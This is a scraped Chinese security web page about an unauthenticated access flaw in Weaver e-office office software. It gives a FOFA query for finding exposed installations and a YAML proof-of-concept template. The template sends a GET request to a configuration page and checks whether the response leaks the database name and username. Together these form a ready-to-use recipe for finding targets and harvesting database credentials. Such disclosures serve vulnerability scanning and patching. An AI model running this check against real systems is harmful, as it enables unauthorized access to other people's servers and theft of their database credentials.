泛微e |
您所在的位置:网站首页 › office办公软件未授权 › 泛微e |
泛微e
|
漏洞简介
泛微e-office是一种企业办公自动化软件解决方案,由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office存在未授权访问,攻击者可以访问页面获取敏感信息,可获取数据库账户密码。 fofa 搜索语法(body=“login.php”&&body=“eoffice”)||body=“/general/login/index.php” yaml poc detail: ID: 5285 Author: 匿名作者 Name: 泛微e-office 未授权访问 Description: 泛微e-office是一种企业办公自动化软件解决方案,由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office 存在未授权访问,攻击者可以访问页面获取敏感信息。 Identifier: DVB: DVB-2023-5285 VulnClass: - 认证绕过/未认证 Category: - 应用服务 Manufacturer: 泛微 Product: e-office Type: 1 Status: 1 Scanable: 1 Level: 2 DisclosureDate: '2023-10-18' Is0day: false IncludeExp: false Weakable: false IsXc: false IsCommon: false IsCallBack: false Condition: (body="login.php"&&body="eoffice")||body="/general/login/index.php" Solutions: - 请关注厂商的修复版本,并及时更新到最新版本. poc: relative: req0 session: false requests: - method: GET timeout: 10 path: /building/backmgr/urlpage/mobileurl/config_2.php headers: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.2597.132 Safari/537.36 follow_redirects: true matches: (code.eq("200") && body.contains("数据库名") && body.contains("用户名")) 漏洞复现漏洞路径:/building/backmgr/urlpage/mobileurl/config_2.php https://github.com/wy876/POC |
【本文地址】
今日新闻 |
推荐新闻 |